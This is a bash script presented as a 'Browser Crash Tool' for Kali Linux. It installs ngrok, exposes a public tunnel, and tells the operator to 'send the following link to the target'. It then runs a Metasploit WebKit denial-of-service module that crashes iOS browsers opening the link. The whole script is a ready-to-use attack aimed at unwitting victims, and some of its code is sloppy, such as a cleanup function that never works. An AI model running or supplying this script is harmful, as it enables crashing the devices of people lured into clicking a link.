#!/bin/bash # Colors RED='\033[0;31m' GREEN='\033[0;32m' CYAN='\033[0;36m' YELLOW='\033[0;33m' BLUE='\033[0;34m' NC='\033[0m' # No Color # Title and banner clear echo -e "${BLUE}============================================${NC}" echo -e "${BLUE} Browser Crash Tool - Kali ${NC}" echo -e "${BLUE}============================================${NC}" echo -e "${YELLOW}This tool uses Metasploit to exploit a vulnerability in iOS WebKit.${NC}" echo -e "${YELLOW}Ensure you have Metasploit and Ngrok installed!${NC}" echo -e "" # Function to clean up ngrok process get_ngrok_pid() { local pid pid=$(pgrep -f ngrok) } # Define the command to execute on Ctrl+C on_interrupt() { echo "Ctrl+C detected. Executing command..." # Replace this with the command you want to execute kill -9 $pid } # Check if Metasploit is installed if ! command -v msfconsole &> /dev/null then echo -e "${RED}[ERROR] Metasploit is not installed. Please install it and try again.${NC}" exit 1 fi # Check if Ngrok is installed if ! command -v ngrok &> /dev/null then echo -e "${RED}[ERROR] Ngrok is not installed. Installing Ngrok...${NC}" # Add ngrok's apt key curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null # Add the ngrok apt repo (replace $(lsb_release -cs) with your Ubuntu codename if needed, e.g., jammy, focal) echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list # Update and install sudo apt-get update sudo apt-get install ngrok -y fi # Start Ngrok to get a public URL echo -e "${YELLOW}[INFO] Starting Ngrok on port 80...${NC}" ngrok http 443 > /dev/null & NGROK_PID=$! sleep 5 # Get the public Ngrok URL NGROK_URL=$(curl -s http://localhost:4040/api/tunnels | grep -oP '(?<=public_url":")https://[^"]+') if [ -z "$NGROK_URL" ]; then echo -e "${RED}[ERROR] Failed to get Ngrok URL.${NC}" exit 1 fi # Inform the user echo -e "${GREEN}[INFO] The browser crash is live! Send the following link to the target:${NC}" echo -e " ${CYAN}$NGROK_URL/${NC}" echo -e "${GREEN}[INFO] Press Ctrl+C to stop.${NC}" # Launch Metasploit with the WebKit module in the background echo -e "${YELLOW}[INFO] Launching Metasploit to exploit WebKit vulnerability...${NC}" ( msfconsole -q -x "use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur;set SRVPORT 443; set ssl true; set URIPATH /;exploit" ) # Wait for Metasploit to start sleep 10 # Set up the trap to catch Ctrl+C (SIGINT) and call the on_interrupt function trap 'on_interrupt' INT